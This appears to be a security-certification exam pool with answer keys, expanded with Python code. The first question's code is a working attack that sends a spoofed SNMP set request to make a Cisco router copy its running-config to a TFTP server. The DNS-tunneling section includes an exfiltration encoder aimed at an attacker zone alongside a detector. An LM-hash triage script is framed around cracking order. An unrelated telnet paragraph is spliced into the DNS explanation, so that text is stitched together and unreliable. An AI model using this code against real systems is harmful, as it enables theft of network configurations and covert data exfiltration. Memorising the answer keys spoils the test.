Topic 2: Exam Pool B
The network administrator at Spears Technology, Inc has configured the default gateway
Cisco router's access-list as below:
You are hired to conduct security testing on their network.
You successfully brute-force the SNMP community string using an SNMP cracking tool.
The access-list configured at the router prevents you from establishing a successful
connection.
You want to retrieve the Cisco configuration from the router. How would you proceed?
A.
Use the Cisco's TFTP default password to connect and download the configuration file
B.
Run a network sniffer and capture the returned traffic with the configuration file from the
router
C.
Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the
router masking your IP address
D.
Send a customized SNMP set request with a spoofed source IP address in the range
192.168.1.0
Run a network sniffer and capture the returned traffic with the configuration file from the
router
Send a customized SNMP set request with a spoofed source IP address in the range
192.168.1.0
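The technique the answer describes, shown as an added example that is not part of this exam pool and not taken from any Cisco or SNMP tool: an SNMPv2c SetRequest is BER-encoded by hand, a CISCO-CONFIG-COPY-MIB row instructs the router to copy its running-config to a TFTP server, and the datagram is wrapped in a hand-built IPv4/UDP header so that the source address can be one the router's access-list permits. Because the router answers the spoofed source (not you), the SNMP response and the TFTP transfer have to be captured with a sniffer on a segment you can see. The router address, the spoofed source, the TFTP server, the row index and the file name are assumptions; sending raw packets needs root (CAP_NET_RAW).

```python
import socket
import struct

# --- minimal BER / SNMP encoder ---------------------------------------------

def ber_len(n):
    """BER length: short form below 128, long form (0x80|N followed by N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(v):
    """INTEGER as minimal two's complement (a leading 0x00 keeps values >= 0x80 positive)."""
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def ber_oid(dotted):
    """OBJECT IDENTIFIER: the first two arcs fold into one byte, the rest are base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(reversed(chunk))
    return tlv(0x06, bytes(body))


class IpAddress(str):
    """Marker type: encode a dotted string as SNMP IpAddress (APPLICATION 0, tag 0x40)."""


def ber_value(v):
    if isinstance(v, IpAddress):
        return tlv(0x40, socket.inet_aton(v))
    if isinstance(v, int):
        return ber_int(v)
    return tlv(0x04, v)  # OCTET STRING


def build_snmp_set(community, varbinds, request_id=1):
    """SNMPv2c SetRequest: SEQ { version=1, community, 0xA3 { id, 0, 0, SEQ { varbinds } } }."""
    vbl = b"".join(tlv(0x30, ber_oid(oid) + ber_value(val)) for oid, val in varbinds)
    pdu = tlv(0xA3, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, vbl))
    return tlv(0x30, ber_int(1) + tlv(0x04, community) + pdu)


# --- CISCO-CONFIG-COPY-MIB row, equivalent to "copy running-config tftp:" -----

CC_ENTRY = "1.3.6.1.4.1.9.9.96.1.1.1.1"   # ccCopyEntry; columns below are its OIDs


def config_copy_varbinds(tftp_server, filename, row=1234):
    """One ccCopyEntry row created with RowStatus createAndGo(4); the row index is arbitrary."""
    return [
        (f"{CC_ENTRY}.2.{row}", 1),                       # ccCopyProtocol = tftp(1)
        (f"{CC_ENTRY}.3.{row}", 4),                       # ccCopySourceFileType = runningConfig(4)
        (f"{CC_ENTRY}.4.{row}", 1),                       # ccCopyDestFileType = networkFile(1)
        (f"{CC_ENTRY}.5.{row}", IpAddress(tftp_server)),  # ccCopyServerAddress
        (f"{CC_ENTRY}.6.{row}", filename.encode()),       # ccCopyFileName
        (f"{CC_ENTRY}.14.{row}", 4),                      # ccCopyEntryRowStatus = createAndGo(4)
    ]


# --- raw IPv4/UDP framing so the source address is ours to choose --------------

def checksum(data):
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ip_udp_packet(src, dst, payload, sport=40000, dport=161):
    """IPv4 header with checksum filled in, UDP header with checksum 0 (omitted; legal on IPv4)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0, 64, 17, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + udp


def send_spoofed(packet, dst):
    """Needs root/CAP_NET_RAW; with IP_HDRINCL the kernel sends our header as-is."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        s.sendto(packet, (dst, 0))


if __name__ == "__main__":
    # Hypothetical addresses: router 192.168.1.1, a spoofed source inside the permitted
    # 192.168.1.0/24, and the TFTP server (192.168.1.77) on the segment your sniffer watches.
    snmp = build_snmp_set(b"private", config_copy_varbinds("192.168.1.77", "running.cfg"))
    pkt = ip_udp_packet("192.168.1.50", "192.168.1.1", snmp)
    print(f"{len(pkt)} bytes on the wire, SNMP payload: {snmp.hex()}")
    # send_spoofed(pkt, "192.168.1.1")  # then: tcpdump -ni eth0 'udp port 161 or udp port 69'
```

Legacy IOS also honours the older OLD-CISCO-SYS-MIB writeNet object (1.3.6.1.4.1.9.2.1.55.<tftp-ip> set to a file name); the same encoder builds that single-varbind request. Either way the community string must have write access, which is exactly what the brute-forced string gives you.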
Sam, a professional hacker, targeted an organization with the intention of compromising
AWS IAM credentials. He attempted to lure one of the employees of the organization by
initiating fake calls while posing as a legitimate employee. Moreover, he sent phishing
emails to steal the AWS IAM credentials and further compromise the employee's account.
What is the technique used by Sam to compromise the AWS IAM credentials?
A.
Social engineering
B.
Insider threat
C.
Password reuse
D.
Reverse engineering
Social engineering
Explanation:
Just like any other service that accepts usernames and passwords for logging in, AWS
users are vulnerable to social engineering attacks from attackers. Fake emails, calls, or any
other method of social engineering may end with an AWS user's credentials in the hands of
an attacker.
If a user only uses API keys for accessing AWS, general phishing techniques could still be
used to gain access to other accounts or their PC itself, where the attacker may then pull
the API keys for the aforementioned AWS user.
With basic open-source intelligence (OSINT), it's usually simple to collect a list of workers
of an organization who use AWS on a regular basis. This list can then be targeted with spear
phishing to try and gather credentials. An easy technique may include an email that says
your bill has spiked 500% within the past 24 hours, "click here for additional information",
and when they click the link, they're forwarded to a malicious copy of the AWS login page
designed to steal their credentials.
An example of such an email can be seen in the screenshot below. It looks exactly like an
email that AWS would send to you if you were to exceed the free tier limits, except for a
few little changes. If you clicked on any of the highlighted regions in the screenshot,
you would not be taken to the official AWS website and would instead be forwarded to a fake
login page set up to steal your credentials.
These emails can get even more specific by doing a bit more OSINT before sending them
out. If an attacker was able to discover your AWS account ID online somewhere, they could
use methods we at Rhino have released previously to enumerate what users and roles exist
in your account without any logs appearing on your side. They could use this list to further
refine their target list, as well as their emails, to reference services they know that you
often use.
For reference, the blog post on using AWS account IDs for role enumeration can be found
here, and the blog post on using AWS account IDs for user enumeration can be found here.
During engagements at Rhino, we find that phishing is one of the fastest ways for us to
gain access to an AWS environment.
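The tell the explanation points at, a link that promises AWS while its target is somewhere else, can be checked mechanically before anyone clicks. The following is an added example and not Rhino's code or anything from the exam: it walks the anchors of an HTML email with the standard-library parser and flags any link whose target host is not under an allow-listed AWS domain, plus any link whose visible text names a different host than the href. The allow-list, the sample email and the look-alike domains in it are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a genuine AWS billing notice links to (assumption for this example; extend per tenant).
AWS_DOMAINS = ("amazon.com", "amazonaws.com")


def host_allowed(host, allowed=AWS_DOMAINS):
    """True if host is exactly an allowed domain or a subdomain of one (no substring matching)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a>; text inside nested tags is kept."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def suspicious_links(html):
    """Return [(href, text, reason)] for links that should not be in an AWS notice."""
    parser = LinkCollector()
    parser.feed(html)
    out = []
    for href, text in parser.links:
        host = (urlparse(href).hostname or "").lower()
        reasons = []
        if not host_allowed(host):
            reasons.append(f"target host {host!r} is not an AWS domain")
        # If the anchor text itself looks like a URL or host, it must agree with the real target.
        shown = ""
        if " " not in text and "." in text:
            shown = (urlparse(text if "://" in text else "//" + text).hostname or "").lower()
        if shown and shown != host:
            reasons.append(f"text shows {shown!r} but link goes to {host!r}")
        if reasons:
            out.append((href, text, "; ".join(reasons)))
    return out


# Constructed sample: a bill-spike lure whose buttons point at look-alike domains.
SAMPLE_EMAIL = """
<p>Your estimated charges rose 500% in the last 24 hours.</p>
<a href="https://console.aws-amazon-billing.com/signin">Sign in to your account</a>
<a href="https://aws.amazon.com/free/">AWS Free Tier</a>
<a href="https://amaz0n.com/console">https://console.aws.amazon.com/billing</a>
"""

if __name__ == "__main__":
    for href, text, why in suspicious_links(SAMPLE_EMAIL):
        print(f"{why}: [{text}] -> {href}")
```

The subdomain test uses an exact-suffix match on a dotted boundary, so "aws.amazon.com.evil.net" and "aws-amazon-billing.com" both fail it; a plain substring check for "amazon.com" would pass the first of those.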
How can you determine if an LM hash you extracted contains a password that is less than
8 characters long?
A.
There is no way to tell because a hash cannot be reversed
B.
The right most portion of the hash is always the same
C.
The hash always starts with AB923D
D.
The left most portion of the hash is always the same
E.
A portion of the hash will be all 0's
The right most portion of the hash is always the same
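The property the answer relies on, as an added example that is not taken from the exam: LM upper-cases the password, pads it with nulls to 14 bytes, splits it into two 7-byte halves and DES-encrypts the constant KGS!@#$% with each half as the key. A password of 7 characters or fewer therefore has an all-zero second half, whose ciphertext is always aad3b435b51404ee. The code below classifies constructed pwdump-style lines by that rule; the user names and hashes are made up apart from the two well-known constants (the empty LM half and the NT hash of an empty password).

```python
EMPTY_LM_HALF = "aad3b435b51404ee"             # DES_k(KGS!@#$%) with an all-zero 7-byte half
EMPTY_LM = EMPTY_LM_HALF * 2                    # LM value stored for "" or when LM is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of the empty UTF-16LE password


def classify_lm(lm_hex, nt_hex=None):
    """Say what an LM hash reveals about password length before any cracking is done."""
    lm = lm_hex.lower()
    if len(lm) != 32:
        raise ValueError("LM hash must be 16 bytes of hex")
    if lm == EMPTY_LM:
        # Both halves empty: either the password is empty or LM was never stored.
        if nt_hex and nt_hex.lower() == EMPTY_NT:
            return "empty password"
        return "LM not stored (password longer than 14 chars or LM hashing disabled)"
    if lm[16:] == EMPTY_LM_HALF:
        return "password is 1-7 characters: only the first half needs cracking"
    return "password is 8-14 characters: two independent 7-character halves"


def parse_pwdump(line):
    """pwdump/samdump2 format: user:rid:lmhash:nthash:::"""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm, nt


def triage(lines):
    """Map each account in a dump to the LM verdict."""
    report = {}
    for line in lines:
        if not line.strip():
            continue
        user, _rid, lm, nt = parse_pwdump(line)
        report[user] = classify_lm(lm, nt)
    return report


# Constructed dump: real-looking structure, invented hash values except the constants above.
SAMPLE = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1001:0182bd0bd4444bf8aad3b435b51404ee:f5f2a6d9e1a7e2c9f6d1c4b3a2918fff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jdoe:1002:aad3b435b51404eeaad3b435b51404ee:2b2ac2d1c7c8fda6cea80b5fad7563aa:::
"""

if __name__ == "__main__":
    for user, verdict in triage(SAMPLE.splitlines()).items():
        print(f"{user:14s} {verdict}")
```

The practical consequence for a cracking run: every LM hash is at most two independent 7-character upper-case problems, and an account whose second half is the constant is a single one, which is why such accounts are cracked first.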
In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range
does a Medium-severity vulnerability fall in?
A.
3.0-6.9
B.
4.0-6.0
C.
4.0-6.9
D.
3.9-6.9
4.0-6.9
Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS
tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the
firewalls. On which of the following ports should Robin run the NSTX tool?
A.
Port 53
B.
Port 23
C.
Port 50
D.
Port 80
Port 53
Explanation:
DNS uses port 53, which is almost always open on systems, firewalls, and clients, to
transmit DNS queries. Instead of the more familiar Transmission Control Protocol (TCP),
these queries use the User Datagram Protocol (UDP) because of its lower latency, bandwidth
and resource usage compared to TCP-equivalent queries. UDP has no error- or flow-control
capabilities, and beyond a simple checksum it has no integrity checking to make sure the
data arrived intact. How is internet use (browsing, apps, chat, etc.) so reliable then? If
the UDP DNS query fails (it is a best-effort protocol after all) in the first instance, most
systems will retry a number of times and, only after multiple failures, potentially switch
to TCP before trying again; TCP is also used if the DNS query exceeds the limits of the UDP
datagram size, typically 512 bytes for DNS but dependent on system settings. Figure 1 below
illustrates the basic process of how DNS operates: the client sends a query string (for
example, mail.google[.]com in this case) with a particular type, typically A for a host
address. I've skipped the part whereby intermediate DNS systems may need to establish
where '.com' exists before finding out where 'google[.]com' can be found, and so on.
Many worms and scanners have been created to find and exploit systems running telnet.
Given these facts, it is really no surprise that telnet is usually seen on the Top Ten
Target Ports list. Several of the vulnerabilities of telnet have been fixed; they require
only an upgrade to the most current version of the telnet daemon or an OS upgrade. As is
usually the case, this upgrade has not been performed on a number of devices. This may be
due to the fact that a lot of systems administrators and users don't fully understand the
risks involved in using telnet. Unfortunately, the only solution for some of telnet's
vulnerabilities is to completely discontinue its use. The preferred method of mitigating
all of telnet's vulnerabilities is replacing it with alternate protocols like SSH. SSH is
capable of providing many of the same functions as telnet and several additional services
typically handled by other protocols like FTP and X Windows. SSH does still have several
drawbacks to overcome before it can completely replace telnet: it is typically only
supported on newer equipment; it requires processor and memory resources to perform the
data encryption and decryption; and it requires greater bandwidth than telnet because of
the encryption of the data. This paper was written to help clarify how dangerous the use
of telnet can be and to provide solutions to alleviate the main known threats in order to
improve the general security of the internet.
Once a name is resolved to an IP, caching also helps: the resolved name-to-IP mapping is
usually cached on the local system (and possibly on intermediate DNS servers) for a period
of time. Subsequent queries for the same name from the same client then don't leave the
local system until that cache expires. Of course, once the IP address of the remote service
is known, applications can use that information to enable other TCP-based protocols, like
HTTP, to do their actual work, for instance ensuring internet cat GIFs can be reliably
shared with your colleagues. So, all in all, a couple of dozen extra UDP DNS queries from an
organization's network would be fairly inconspicuous and would allow a malicious payload to
beacon out to an adversary; commands could even be received by the requesting application
for processing with little difficulty.
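Putting the two halves of the explanation together, the data leaving inside ordinary-looking UDP queries on port 53 and what a defender can look for in them: the encoding side below splits a payload into base32 labels (a label is at most 63 octets and a name at most 253), and the detection side scores each zone seen in a DNS query log by unique-name ratio, average prefix length, label entropy and record type. This is an added example, not NSTX's or any other tool's code; the zone name, the log format (timestamp, client, type, name), the thresholds and the log lines are assumptions constructed for the example, and the payload is deterministic filler standing in for an encrypted file.

```python
import base64
import hashlib
import math
from collections import defaultdict

TUNNEL_ZONE = "t.example.com"   # hypothetical attacker-controlled zone


def exfil_queries(payload, zone=TUNNEL_ZONE, label_len=60):
    """Tunnel side: base32 the payload and carry it as <seq>.<chunk>.<zone> query names.
    Base32 survives resolvers that fold case; label_len must stay <= 63 octets."""
    text = base64.b32encode(payload).decode().rstrip("=").lower()
    names = []
    for seq, i in enumerate(range(0, len(text), label_len)):
        name = f"{seq}.{text[i:i + label_len]}.{zone}"
        if any(len(lab) > 63 for lab in name.split(".")) or len(name) > 253:
            raise ValueError("DNS name limits exceeded")
        names.append(name)
    return names


def entropy(s):
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def zone_of(qname):
    """Approximate the registrable zone as the last two labels (no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze(log_lines, min_queries=5, unique_ratio=0.8, avg_prefix_len=30,
            avg_entropy=3.0, data_type_share=0.5):
    """Detection side: return {zone: [reasons]} for zones whose queries look like a tunnel."""
    by_zone = defaultdict(list)
    for line in log_lines:
        _ts, _client, qtype, qname = line.split()
        by_zone[zone_of(qname)].append((qtype.upper(), qname.lower()))
    findings = {}
    for zone, queries in by_zone.items():
        if len(queries) < min_queries:
            continue
        names = [q for _, q in queries]
        prefixes = [q[: -len(zone) - 1] for q in names]      # everything left of the zone
        reasons = []
        if (len(set(names)) / len(names) >= unique_ratio
                and sum(map(len, prefixes)) / len(prefixes) >= avg_prefix_len):
            reasons.append("many long, never-repeated names (caching would repeat real lookups)")
        if sum(map(entropy, prefixes)) / len(prefixes) >= avg_entropy:
            reasons.append("high-entropy labels")
        if sum(t in ("TXT", "NULL", "CNAME") for t, _ in queries) / len(queries) >= data_type_share:
            reasons.append("record types that carry arbitrary data dominate")
        if reasons:
            findings[zone] = reasons
    return findings


def sample_log():
    """Constructed log: a little normal browsing plus one exfiltration burst from 10.0.0.7."""
    payload = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(7))[:200]
    lines = [f"12:00:0{i} 10.0.0.{i % 3 + 1} A {n}" for i, n in
             enumerate(["www.google.com", "mail.google.com", "www.google.com",
                        "drive.google.com", "www.google.com", "mail.google.com"])]
    lines += [f"12:01:{i:02d} 10.0.0.7 TXT {n}" for i, n in enumerate(exfil_queries(payload))]
    return lines


if __name__ == "__main__":
    for zone, why in analyze(sample_log()).items():
        print(zone, "->", "; ".join(why))
```

The first rule is the one the explanation's caching remark motivates: genuine lookups for a zone repeat the same few names and are absorbed by the local cache, whereas a tunnel must mint a new name for every chunk or the answer would come back from cache instead of the attacker's server.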